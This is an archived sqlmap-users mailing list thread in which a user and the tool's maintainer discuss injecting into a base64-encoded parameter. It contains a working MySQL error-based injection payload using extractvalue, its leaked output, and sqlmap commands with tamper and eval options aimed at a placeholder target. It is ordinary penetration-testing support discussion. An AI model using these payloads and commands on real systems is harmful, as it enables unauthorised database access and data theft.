Then please try --eval instead of --tamper.
E.g. --eval="param=param.encode('base64')"
Bye
On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <konr...@smelkovs.com> wrote:
> Miroslav,
>
> I previously exploited this manually. The injection occurs in the mysql
> INSERT statement. If the statement is invalid, we get an error message in
> html comments like so:
>
> <!--You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use near
> ''lalalaa))) or'')' at line 1-->
>
> Which then is exploitable using some well documented methods such as
> appending string like this:
> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>
> which gives us a nice error:
> <!--XPATH syntax error: '~root@localhost'-->
>
>
> Anyhow, I got halfway there with the following string:
> sqlmap -u '
> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337'
> --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
> sqlmap sends correctly encoded test vectors, but it doesn't send the
> correct initial URL stability check vector:
>
> 1st request URL:
> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
> 2nd request URL: https://target/script.php?
> data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>
> Also none of the test vectors seem to trigger an error response.
>
> I tried with --risk=3 with no avail.
>
> version: 1.0-dev-1ef2c40
>
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On 30 October 2014 13:12, Miroslav Stampar <miroslav.stam...@gmail.com>
> wrote:
>
>> Hi.
>>
>> In your case I would do this:
>>
>> 1) Decode original base64 value and give it to the sqlmap in decoded form
>> (e.g. id=123 instead of original id=313233)
>> 2) Use --tamper=base64encode
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <konr...@smelkovs.com>
>> wrote:
>>
>>> Hello,
>>>
>>> I am writing a small modification which would allow to tamper/decode
>>> variables in the request?
>>> As I understand that the parameters are decoded/parsed into a dict
>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>> full, parsed dict of the get/post/cookie values?
>>>
>>> (specifically I have a base64 encoded string as a parameter and to
>>> insert the payload, the parameter must be base64-decoded, injected and
>>> then encoded back)
>>>
>>>
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
------------------------------------------------------------------------------
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
